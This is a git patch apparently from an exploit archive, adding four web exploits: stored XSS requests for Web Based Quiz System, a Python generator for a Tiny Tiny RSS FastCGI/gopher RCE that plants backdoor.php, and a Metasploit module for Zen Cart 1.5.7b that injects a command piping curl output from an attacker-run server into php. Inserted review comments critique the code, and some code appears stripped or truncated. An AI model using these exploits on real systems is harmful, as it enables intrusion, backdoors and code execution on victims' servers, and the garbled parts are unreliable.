From b35005d47b1caaea03ca2bb5f7df7ac716139ee0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 3 Mar 2021 05:01:55 +0000 Subject: [PATCH] DB: 2021-03-03 4 changes to exploits/shellcodes Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting Tiny Tiny RSS - Remote Code Execution Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting Zen Cart 1.5.7b - Remote Code Execution (Authenticated) --- exploits/php/webapps/49605.txt | 42 +++++++ exploits/php/webapps/49606.py | 83 +++++++++++++ exploits/php/webapps/49607.txt | 60 ++++++++++ exploits/php/webapps/49608.rb | 213 +++++++++++++++++++++++++++++++++ files_exploits.csv | 4 + 5 files changed, 402 insertions(+) create mode 100644 exploits/php/webapps/49605.txt create mode 100755 exploits/php/webapps/49606.py create mode 100644 exploits/php/webapps/49607.txt create mode 100755 exploits/php/webapps/49608.rb diff --git a/exploits/php/webapps/49605.txt b/exploits/php/webapps/49605.txt new file mode 100644 index 000000000..e8e450999 --- /dev/null +++ b/exploits/php/webapps/49605.txt 
@@ -0,0 +1,42 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: Praharsh Kumar Singh
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+# Vulnerability Type: Cross-site Scripting
+# Vulnerability: Persistent/Stored XSS
+# Tested on: Parrot OS
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in adding questions in options parameter affected from this vulnerability.
+# payload:
+
+POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 101
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
+Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+
+qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
+
+POC:
+# go to url http://localhost:8080/admin.php
+# login and add question
+# then put the above payload in MCQ options parameter
+# then fill the remaining details
+# then click add
+# go to url http://localhost:8080/login.php
+# then login to user account
+# then attempt the quiz while attempting the quiz xss pop up there..!
\ No newline at end of file
diff --git a/exploits/php/webapps/49606.py b/exploits/php/webapps/49606.py
new file mode 100755
index 000000000..808031cf2
--- /dev/null
+++ b/exploits/php/webapps/49606.py
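Review bot: The captured request and the reproduction steps describe two different deployments: the POST targets `/onlinequiz_0/update.php` with `Host: localhost`, while the POC steps use `http://localhost:8080/admin.php` and `http://localhost:8080/login.php`, so the advisory should settle on one base URL so that the steps and the request agree. Neither this advisory nor 49607.txt in the same commit names the script that renders the stored value without encoding, nor the fix (HTML-encode the option/name on output, e.g. `htmlspecialchars()`), which is what a maintainer or a defender assessing exposure needs; one-line `# Affected output:` and `# Remediation:` entries in the header block would cover it. In 49607.txt the `name` form-data part is empty in this listing, which looks like the value was stripped during rendering rather than omitted by the author, and is worth checking against the committed file.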
@@ -0,0 +1,83 @@ +# Exploit Title: Tiny Tiny RSS - Remote Code Execution +# Date: 21/09/2020 +# Exploit Author: Daniel Neagaru & Benjamin Nadarević +# Blog post: https://www.digeex.de/blog/tinytinyrss/ +# Software Link: https://git.tt-rss.org/fox/tt-rss +# Version: all before 2020-09-16 +# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef +# Tested on: default docker installation method +# CVE : CVE-2020-25787 + +#!/usr/bin/env python3 + +from sys import argv +import urllib.parse as ul +import base64 + + +def CustomFcgi( filename, output, backdoor): + length=len(output)+len(backdoor)+64 + char=chr(length) + + data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length))) + data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n" + data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/" + + temp1 = chr(len(data) // 256) + temp2 = chr(len(data) % 256) + temp3 = chr(len(data) % 8) + + end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00" + end += "\x00\x00\x00\x00" + start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00" + + payload = start + data + end + def get_payload(payload): + finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/") + return finalpayload + + return "gopher://localhost:9000/_"+get_payload(get_payload(payload)) + + + +TTRSS_PATH = "/var/www/html/tt-rss/" +BACKDOOR_CODE = """ + +""" + + +feed_file = open("malicious_RCE_feed.xml",'w') +filename = TTRSS_PATH + "config.php" +output = TTRSS_PATH + "backdoor.php" + +backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) +rce = 
"public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" + +feed =""" + + + + Exploit demo - rce + + You are getting infected :( + + Check if there is backdoor.php + + + + + ]]> + + + + +""".format(rce) + +feed_file.write(feed) +feed_file.close() \ No newline at end of file diff --git a/exploits/php/webapps/49607.txt b/exploits/php/webapps/49607.txt new file mode 100644 index 000000000..cdca60fa2 --- /dev/null +++ b/exploits/php/webapps/49607.txt 
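Review bot: `feed_file = open("malicious_RCE_feed.xml",'w')` is opened before `rce` and `feed` are built and is closed only by the trailing `feed_file.close()`, so any exception in between leaks the handle; write it as `with open("malicious_RCE_feed.xml", "w", encoding="utf-8") as feed_file: feed_file.write(feed)` and drop the separate close. The shebang `#!/usr/bin/env python3` sits after the header comments, where it has no effect even though the file is committed with mode 100755; it belongs on line 1 with the header below it. In `CustomFcgi` the `output` and `backdoor` parameters only contribute to `length`, the nested `get_payload` is redefined on every call and could be a module-level helper, and `temp1`/`temp2`/`temp3` would read better as named length fields. `BACKDOOR_CODE` and the `feed` template show no content or `{}` placeholder for `.format(rce)` in this listing, which looks like markup stripped during rendering rather than the committed file, so the listing as shown cannot be judged for correctness; the header's upstream fix commit and CVE-2020-25787 reference are the useful anchors for anyone triaging exposure.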
@@ -0,0 +1,60 @@ +# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting +# Date: 2021-03-02 +# Exploit Author: P.Naveen Kumar +# Vendor Homepage: https://www.sourcecodester.com +# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html +# Software : Web Based Quiz System +# Version : 1.0 +# Vulnerability Type : Cross-site Scripting +# Vulnerability : Persistent/Stored XSS +# Tested on: Windows 10 Pro + +# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe +# in registration form in name parameter affected from this vulnerability. +# payload: + +# HTTP POST request +POST http://localhost:8080/quiz/register.php HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636 +Content-Length: 690 +Origin: http://localhost:8080 +Connection: keep-alive +Referer: http://localhost:8080/quiz/register.php +Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er +Upgrade-Insecure-Requests: 1 + +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="name" + + +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="email" + +test123@gmail.com +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="password" + +Hacker +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="college" + +hello +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="submit" + + 
+-----------------------------283640616528311462411171270636-- + +POC: +# go to url http://localhost:8080/quiz/register.php +# then you have to fill the above payload in name/username parameter +# then fill the remaining details +# then click submit +# then login to user account +# then attempt any one quiz after attempting go to ranking section then +# you can see xss pop up there..! \ No newline at end of file diff --git a/exploits/php/webapps/49608.rb b/exploits/php/webapps/49608.rb new file mode 100755 index 000000000..1afa95e0e --- /dev/null +++ b/exploits/php/webapps/49608.rb 
@@ -0,0 +1,213 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# +# This exploit write payload in database and trig to command +# a bug in an zencart v1.5.7b web application +# +### +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'zencart authenticated remote code execution exploit', + 'Description' => %q( + This exploit module execution os command in zencart. + ), + 'License' => MSF_LICENSE, + 'Author' => ['Mucahit Saratar '], # msf module & research & poc + 'References' =>[ + [ 'OSVDB', '' ], + [ 'EDB', '' ], + [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'], + [ 'CVE', '2021-3291'] + ], + 'Platform' => 'php', + 'Privileged' => false, + 'Arch' => ARCH_PHP, + 'Targets' => [ ['Automatic', { }] ], + 'DisclosureDate' => '2021-01-22', + 'DefaultTarget' => 0 + ) + ) + register_options( + [ + Opt::RPORT(80), + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ true, 'Password to login with', '']), + OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']), + OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']), + OptString.new('SETTING', [ true, 'setting name. eg. 
freecharger for payment', 'freecharger']), + OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/']) + ], self.class + ) + end + + def start_server + ssltut = false + if datastore["SSL"] + ssltut = true + datastore["SSL"] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("payload is on #{get_uri}") + @adresim = get_uri + datastore['SSL'] = true if ssltut + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! Sending 2nd stage of the payload') + send_response(cli, payload.encoded, {'Content-Type'=>'text/html'}) + end + + def tabanyol + datastore["BASEPATH"] + end + + def isim + datastore["USERNAME"] + end + + def parola + datastore["PASSWORD"] + end + + + def login + #"index.php?cmd=login&camefrom=index.php" + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'vars_get' => { + 'cmd' => 'login', + 'camefrom' => 'index.php' + }) + # + unless res + fail_with(Failure::Unreachable, "Access web application failure") + end + if res.code != 200 + fail_with(Failure::Unreachable, "we not have 200 response") + end + + if !res.get_cookies.empty? + @cookie = res.get_cookies + @csrftoken = res.body.scan(//).flatten[0] || '' + if @csrftoken.empty? 
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + vprint_good("login Csrf token: "+@csrftoken) + end + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"), + 'cookie' => @cookie, + 'vars_post' => { + 'securityToken' => @csrftoken, + 'action' => "do"+@csrftoken, + 'admin_name' => isim, + 'admin_pass' => parola + }) + if res.code != 302 + fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.') + end + true + end + + + def check + unless login + fail_with(Failure::UnexpectedReply, 'Wrong credentials') + return CheckCode::NotVulnerable('Wrong credentials') + end + print_good("We loged in") + Exploit::CheckCode::Vulnerable + CheckCode::Vulnerable('Authenticated successfully') + + end + + def exploit + check + start_server + sleep(4) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'vars_get' => { + 'cmd' => 'modules', + 'set' => datastore["MODULE"], + 'module' => datastore["SETTING"], + 'action' => 'edit' + }, + 'cookie' => @cookie + ) + if res.code != 200 + fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200') + end + # + if res && res.code == 200 + @formtoken = res.body.scan(//).flatten[0] || '' + if @formtoken.empty? + fail_with(Failure::UnexpectedReply, 'securitytoken not in response') + end + #print_good(@formtoken) + #
/) + @textarr = res.body.scan(//) + @secme = {} + @secme["securityToken"] = @formtoken + for @a in @radiolar + @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //" + end + for @a in @selectler + @secme["configuration[#{@a[0]}]"] = "0" + end + for @a in @textarr + @secme["configuration[#{@a[0]}]"] = "0" + end + print_good(@secme.to_s) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'cmd' => 'modules', + 'set' => datastore["MODULE"], + 'module' => datastore["SETTING"], + 'action' => 'save' + }, + 'vars_post' => @secme + ) + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'vars_get' => { + 'cmd' => 'modules', + 'set' => datastore["MODULE"], + 'module' => datastore["SETTING"], + 'action' => 'edit' + }, + 'cookie' => @cookie + ) + + end + end + end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f19837ecf..f94cf2776 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
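Review bot: `check` calls `fail_with(Failure::UnexpectedReply, 'Wrong credentials')` and then has an unreachable `return CheckCode::NotVulnerable('Wrong credentials')`, and the bare `Exploit::CheckCode::Vulnerable` on the following line is a discarded expression; a Metasploit `check` is expected to return a CheckCode rather than abort, so the branch should read `return CheckCode::NotVulnerable('Wrong credentials') unless login` with the stray line removed (note that `login` itself only ever returns `true` or calls `fail_with`, so the branch is dead as written). In `exploit`, `if res.code != 200` runs before the `if res && res.code == 200` nil guard, so a missing response raises NoMethodError on nil instead of a clean failure; put `fail_with(Failure::Unreachable, 'no response') unless res` first. The `login` POST branch reuses the message `'There is no CSRF token at HTTP response.'` for a non-302 reply, where something like `'login did not redirect; check credentials'` describes what happened, and the empty `['OSVDB', '']` and `['EDB', '']` reference entries should be dropped. Several identifiers (`tabanyol`, `isim`, `parola`, `radiolar`, `selectler`, `secme`, `adresim`) are Turkish in an English codebase and `for @a in …` uses an instance variable as a loop variable; English local names would help reviewers. The regex literals in `res.body.scan(//)` and the lines that set `@radiolar` and `@selectler` appear empty or truncated here (the `# /)` fragment), presumably stripped during rendering rather than in the committed file.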
@@ -43793,3 +43793,7 @@ id,file,description,date,author,type,platform,port
 49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple,
 49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
 49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
+49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",2021-03-02,"Praharsh Kumar Singh",webapps,php,
+49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
+49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
+49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,